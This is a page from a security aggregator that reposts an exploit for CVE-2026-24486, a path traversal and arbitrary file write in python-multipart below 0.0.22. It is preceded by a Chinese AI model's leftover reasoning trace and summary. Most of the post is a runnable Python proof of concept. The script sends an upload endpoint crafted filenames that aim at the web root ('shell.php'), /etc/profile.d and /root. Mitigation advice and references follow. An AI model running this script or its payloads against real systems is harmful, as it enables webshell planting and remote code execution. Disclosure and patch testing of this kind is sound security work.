好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户的要求是直接写文章描述,不需要特定的开头。 首先,我看看这篇文章的内容。它主要讲的是一个Python库python-multipart的漏洞,版本小于0.0.22。漏洞类型是路径遍历和任意文件写入,CVE编号是CVE-2026-24486。 接下来,漏洞的条件是当应用配置了UPLOAD_DIR,并且UPLOAD_KEEP_FILENAME设置为True时,攻击者可以构造恶意文件名,将上传的文件写入到任意位置。影响包括远程代码执行、配置覆盖等。 然后,文章还提供了PoC脚本,展示了如何利用这个漏洞。最后给出了修复建议:升级库版本、避免使用UPLOAD_KEEP_FILENAME、对文件名进行 sanitization。 现在我要把这些信息浓缩到100字以内。重点包括:库名称、漏洞类型、条件、影响和修复建议。 我可能会这样组织语言:“Python-Multipart <0.0.22 存在路径遍历和任意文件写入漏洞(CVE-2026-24486)。当应用配置 UPLOAD_DIR 且 UPLOAD_KEEP_FILENAME=True 时,攻击者可利用恶意文件名将上传内容写入任意位置,导致远程代码执行或配置覆盖等风险。修复方法包括升级至最新版本、禁用保留原文件名功能或对文件名进行安全处理。” 检查一下字数是否在限制内,并确保关键点都涵盖到了。 </think> Python-Multipart <0.0.22 存在路径遍历和任意文件写入漏洞(CVE-2026-24486)。当应用配置 UPLOAD_DIR 且 UPLOAD_KEEP_FILENAME=True 时,攻击者可利用恶意文件名将上传内容写入任意位置,导致远程代码执行或配置覆盖等风险。修复方法包括升级至最新版本、禁用保留原文件名功能或对文件名进行安全处理。 2026-3-8 15:40:16 Author: cxsecurity.com(查看原文) 阅读量:12 收藏
Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486)
Exploit Title: Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write Date: 2026-02-23 Exploit Author: cardosource Vendor Homepage: https://github.com/Kludex/python-multipart Software Link: https://pypi.org/project/python-multipart/ Version: < 0.0.22 Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo) CVE: CVE-2026-24486 Vulnerability Description: Path Traversal vulnerability in python-multipart streaming multipart parser when using non-default options UPLOAD_DIR and UPLOAD_KEEP_FILENAME=True. An attacker can craft a malicious filename to write uploaded files to arbitrary locations on the filesystem. Exploitation Conditions: - Application configures UPLOAD_DIR (custom upload directory) - UPLOAD_KEEP_FILENAME=True (keeps original client filename) - File size exceeds memory limit (triggers disk flush) Impact: Arbitrary file write → potential RCE (e.g., upload webshell to web root), config overwrite, etc. Proof-of-Concept (Python script using requests): import requests import time import os import sys TARGET_URL = "http://localhost:8000/upload" SOURCE_FILE = "/etc/hosts" # Small file to upload (content written to target) if not os.path.exists(SOURCE_FILE): print(f"[!] Source file not found: {SOURCE_FILE}") sys.exit(1) # Malicious filenames (payloads) payloads = [ "/tmp/poc-abs.txt", "/etc/poc-etc.txt", "/root/poc-root.txt", "../../var/www/html/shell.php", "../../etc/profile.d/mal.sh", "../../../tmp/poc-deep.txt", "../../etc/passwd%00.txt", "//etc//poc-double-slash.txt", ] print("[*] CVE-2026-24486 PoC") print(f"[*] Target: {TARGET_URL}") print(f"[*] Using source file: {SOURCE_FILE}") print(f"[*] Testing {len(payloads)} payloads...\n") for i, filename in enumerate(payloads, 1): print(f"[{i}/{len(payloads)}] Testing: {filename}") try: files = { 'file': (filename, open(SOURCE_FILE, 'rb'), 'text/plain') } r = requests.post(TARGET_URL, files=files, timeout=8) print(f" Status: {r.status_code}") if r.text.strip(): print(f" Response: {r.text.strip()}") else: print(" Response: (empty)") except Exception as e: print(f" Error: {e}") print("-" * 50) time.sleep(1.0) print("\n[*] Done.") print("Verify files in container:") print(" docker exec -it vuln-poc find / -name '*poc*' -o -name '*shell*' 2>/dev/null") print("\nMitigation:") print(" - Upgrade: pip install python-multipart>=0.0.22") print(" - Avoid UPLOAD_KEEP_FILENAME=True") print(" - Sanitize: filename = os.path.basename(file.filename)")
References:
https://nvd.nist.gov/vuln/detail/CVE-2026-24486
https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg
https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4
(patch)
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2026, cxsecurity.com
如有侵权请联系:admin#unsafe.sh